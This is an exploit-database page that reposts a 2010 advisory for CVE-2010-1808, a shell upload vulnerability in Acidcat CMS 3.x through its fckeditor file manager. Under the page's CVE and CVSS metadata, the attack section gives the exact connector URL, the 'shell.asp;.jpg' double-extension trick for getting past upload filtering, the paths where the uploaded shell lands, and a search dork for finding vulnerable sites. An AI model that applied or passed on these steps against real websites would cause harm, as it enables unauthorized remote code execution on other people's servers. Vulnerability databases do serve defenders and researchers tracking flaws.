Advertisement






Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability

CVE Category Price Severity
CVE-2010-1808 CWE-434 $500 High
Author Risk Exploitation Type Date
Exploit-DB High Remote 2010-11-28
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010110098

Below is a copy:

==============================================================================

        [»] Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability

==============================================================================

    [»] Title   :           [ Acidcat CMS v 3.x (fckeditor) Shell
Upload Vulnerability ]

    [»] Script  :           [ Mini-NUKE v2.3  ]

    [»] Language:           [ ASP ]

    [»] Download:           [
http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]

    [»] Author  :           [ Net.Edit0r - [email protected] }

    [»] My Home :           [ ajaxtm.com and datacoders.org ]

    [»] Date    :           [ 2010-11-23 ]

    [»] Version :           [ 3.3.X and 3.2.x ]

    [»] Dork    :           [ "Powered by Acidcat CMS " ]



###########################################################################


===[ Exploit ]===


  [»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp

  [»] asp renamed via the .asp;.jpg (shell.asp;.jpg)

===[ Upload To ]===

  [»] http://server/read_write/file/[Shell]

  [»] http://server/public/File/[Shell]


Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1

     BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic  ~ keracker


###########################################################################



Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.